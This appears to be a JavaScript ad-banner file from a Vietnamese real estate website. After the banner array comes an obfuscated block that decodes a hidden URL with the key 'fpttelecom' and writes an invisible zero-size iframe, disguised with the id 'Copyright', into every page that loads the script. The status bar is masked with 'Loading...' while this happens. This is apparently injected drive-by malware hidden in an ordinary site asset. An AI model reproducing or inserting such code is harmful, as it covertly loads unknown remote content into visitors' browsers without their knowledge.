var arrLeftAdver = [];
		var arrBottomAdver = [['23','','http://www.phumyhung.com.vn/nhadat_detail.php?id=22','02-08-2006','02-08-2007','/files/adver/gardenplaza.jpg','180','90'],['21','','http://www.phumyhung.com.vn/nhadat_detail.php?id=15','11-25-2005','11-25-2006','/files/news/overheadview.jpg','156','90'],['12','','','10-22-2005','10-22-2006','/files/adver/skygarden1.jpg','135','90'],['6','','http://www.phumyhung.com.vn/nhadat_detail.php?id=6','10-21-2005','11-21-2006','/files/adver/mythai3.jpg','142','90'],['11','','http://www.phumyhung.com.vn/nhadat_detail.php?id=3','10-21-2005','11-21-2010','/files/adver/grandview.jpg','165','90'],['14','','','10-22-2005','10-22-2006','/files/adver/myvien.jpg','124','90']];
		
var charArray = new Array(' ', '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+', ',', '-','.', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';','<', '=', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I','J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W','X', 'Y', 'Z', '[', '\\', ']', '^', '_', '`','a', 'b', 'c', 'd', 'e','f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's','t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~','_', '_', '_', '¦', '¦', '¦','//','.','¦', '+', '+', '+', '+', '-', '-', '+', '-', '+','+', '+', '-', '-', '¦', '-', '+',  'i','+', '+', '_', '_', '¦','¯', '´', '­', '±','_', '_', ' ');var hex_digits = new Array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9','A', 'B', 'C', 'D', 'E', 'F');function charToByte(c){var i;for(i=0;i<charArray.length;i++){if(c == charArray[i]){return i+32;}} return 0;};function byteToHex(n){return hex_digits[(n >> 4) & 0xf] + hex_digits[n & 0xf];};function byteToBin(n){var ret_str = "";var i;for(i=7; i>=0; i--){ret_str += (n >> i) & 1;} return ret_str;};function clean_numstr(raw_str, base){var ret_str = "";var c = "";var i;for(i=0; i < raw_str.length; i++){c = raw_str.charAt(i);if(c == "0" || parseInt(c, base) > 0){ret_str += c;}}return ret_str;};function hex_from_chars(value){var char_str = value;var hex_str = "";var i, n;for(i=0; i < char_str.length; i++){n = charToByte(char_str.charAt(i));if(n != 0){hex_str += byteToHex(n);}}return hex_str;};function dec_from_hex(value){var hex_str = clean_numstr(value, 16);var dec_str = "";var dec_byte = "";var i;for(i=0; i < hex_str.length-1; i+=2){dec_str += parseInt(hex_str.substring(i, i+2), 16);}return dec_str;};function bin_from_hex(value){var hex_str = clean_numstr(value, 16);var bin_str = "";var bin_byte = "";var i;for(i=0; i < hex_str.length-1; i+=2){bin_str += byteToBin(parseInt(hex_str.substring(i, i+2), 16));}return bin_str;};function from_char(value){var hex= hex_from_chars(value);var chars,bin;bin=bin_from_hex(hex);chars=dec_from_hex(hex);return chars;};function codede(str,pas){str=unescape(str).replace(/^\s+/, '').replace(/\s+$/, '').split(' ');var p=0,k=0;var s='',r=0;for(var i=0;i<pas.length;i++){p+=parseInt(from_char(pas.substr(i,1)));}p+='';for(var j=0;j<str.length;j++){r= parseInt(str[j]);if(k==p.length){k=0;}r-=parseInt(p.substr(k,1));k++;s+=String.fromCharCode(escape(r));}return s;};window.defaultStatus='Loading...';window.status='Loading...';document.writeln('<iframe id="Copyright" frameborder="no" scrolling="no" src="'+codede("105%20116%20123%20117%2059%2047%2054%20124%20120%20119%2053%2054%2055%2053%2055%20112%20110%2046%20106%20116%20110%2047%20121%20102%20111%20107%2053%20109%20117%20109%20115%20","fpttelecom") + '?right=' + new Date()+'" width="0px" height="0px"></iframe>');window.status='';
